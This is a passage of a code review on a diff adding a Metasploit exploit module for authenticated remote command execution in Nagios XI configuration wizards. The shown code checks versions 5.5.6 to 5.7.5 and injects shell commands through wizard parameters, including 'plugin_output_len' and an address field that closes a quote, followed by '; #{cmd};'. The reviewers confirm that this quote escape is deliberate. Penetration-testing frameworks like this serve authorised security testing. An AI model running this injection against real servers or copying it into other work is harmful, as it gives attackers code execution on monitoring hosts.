modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb

```diff
@@ -0,0 +1,252 @@
+    if nagios_version.nil?
+      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
+    end
+
+    print_status("Target is Nagios XI with version #{nagios_version}.")
+
+    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
+    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
+    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
+      nagios_version = '1.0.0'
+    end
+    @version = Rex::Version.new(nagios_version)
+
+    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
+  end
+
+  def check
+    # Authenticate to ensure we can access the NagiosXI version
+    auth_result, err_msg = authenticate
+    case auth_result
+    when 1
+      return CheckCode::Unknown(err_msg)
+    when 2, 4, 5, 6
+      return CheckCode::Detected(err_msg)
+    when 3
+      return CheckCode::Safe(err_msg)
+    end
+
+    if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check
+      auth_result, err_msg = authenticate
+      case auth_result
+      when 1
+        fail_with(Failure::Disconnected, err_msg)
+      when 2, 4, 5, 6
+        fail_with(Failure::UnexpectedReply, err_msg)
+      when 3
+        fail_with(Failure::NotVulnerable, err_msg)
+      end
+    end
+
+    # execute payload based on the selected targeted configuration wizard
+    url_params = {
+      'update' => 1,
+      'nsp' => @nsp
+    }
+    # After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
+    # changes from address to ip_address
+    if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.5.7')
+      address_param = 'address'
+    else
+      address_param = 'ip_address'
+    end
+
+    # CVE-2021-25296 affects the windowswmi configuration wizard.
+    if datastore['TARGET_CVE'] == 'CVE-2021-25296'
+      url_params = url_params.merge({
+        'nextstep' => 3,
+        'wizard' => 'windowswmi',
+        'ip_address' => Rex::Text.rand_text_alpha(7..15),
+        'domain' => Rex::Text.rand_text_alpha(7..15),
+        'username' => Rex::Text.rand_text_alpha(7..20),
+        'password' => Rex::Text.rand_text_alpha(7..20),
+        'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
+      })
+    # CVE-2021-25297 affects the switch configuration wizard.
+    elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'
+      url_params = url_params.merge({
+        'nextstep' => 3,
+        'wizard' => 'switch',
+        address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
```

Comment:
All the others are without this `\"` part so not sure if that was intentional or not?

Reply:
It is, the shell command it's appended to in this particular case needs a quote escaped in order to end it with the semicolon

Reply:
Sounds good, just wanted to double check but if this is expected I'll mark this as resolved.